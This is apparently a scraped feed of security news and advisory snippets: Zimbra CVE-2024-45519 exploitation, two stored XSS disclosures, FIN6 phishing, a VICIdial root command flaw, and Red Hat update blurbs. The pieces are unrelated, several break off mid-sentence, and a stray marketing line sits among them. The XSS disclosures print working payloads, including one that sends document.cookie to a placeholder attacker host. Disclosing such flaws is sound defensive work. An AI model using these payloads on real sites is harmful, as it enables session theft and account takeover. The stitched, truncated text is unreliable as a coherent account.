#js

Cybersecurity researchers are warning about active exploitation attempts targeting a newly disclosed security flaw in Synacor's Zimbra Collaboration. Enterprise security firm Proofpoint said it began observing the activity starting September 28, 2024. The attacks seek to exploit CVE-2024-45519, a severe security flaw in Zimbra's postjournal service that could enable unauthenticated attackers to

The bug gives attackers a way to run arbitrary code on affected servers and take control of them.

### Summary The application fail to sanitising inputs properly and rendering the code from user input to browser which allow an attacker to execute malicious javascript code. ### Details User with Admin role can create a Device Groups, the application did not properly sanitize the user input in the Device Groups name, when user see the detail of the Device Group, if java script code is inside the name of the Device Groups, its will be trigger. ### PoC 1. Login as an Admin role user. Then go over to "$URL/device-groups" 2. Create a new Device Group with this payload in their name ```js <img src="x" onerror="alert(document.cookie)"> ```  3. Go over to the detail page of that Device Groups, in this case "$URL/devices/group=2". Will see a pop-up.  ### Impact Attacker can use this to perform malicious java scri...

### Summary A Stored Cross-Site Scripting (XSS) vulnerability in the "Alert Rules" feature allows authenticated users to inject arbitrary JavaScript through the "Title" field. This vulnerability can lead to the execution of malicious code in the context of other users' sessions, potentially compromising their accounts and allowing unauthorized actions. ### Details The vulnerability occurs when creating an alert rule. The application does not properly sanitize user inputs in the "Title" field, which allows an attacker to escape the attribute context where the title is injected (data-content). Despite some character restrictions, the attacker can still inject a payload that leverages available attributes on the div element to execute JavaScript automatically when the page loads. For example, the following payload can be used: ```test1'' autofocus onfocus="document.location='https://<attacker-url>/logger.php?c='+document.cookie"``` This payload triggers the XSS when the affected page i...

Did you know that over 80% of web applications fail due to poor planning and execution? Now imagine…

The FIN6 group is the likely culprit behind a spear-phishing campaign that demonstrates a shift in tactics, from targeting job seekers to going after those who hire.

An attacker with authenticated access to VICIdial as an "agent" can execute arbitrary shell commands as the "root" user. This attack can be chained with CVE-2024-8503 to execute arbitrary shell commands starting from an unauthenticated perspective.

Red Hat Security Advisory 2024-7443-03 - Updated images are now available for Red Hat Advanced Cluster Security for Kubernetes. The updated image includes security and bug fixes.

Red Hat Security Advisory 2024-7442-03 - A security update is now available for Red Hat JBoss Enterprise Application Platform 8.0. Issues addressed include an information leakage vulnerability.

Red Hat Security Advisory 2024-7441-03 - A security update is now available for Red Hat JBoss Enterprise Application Platform 8.0. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link in the References section. Issues addressed include an information leakage vulnerability.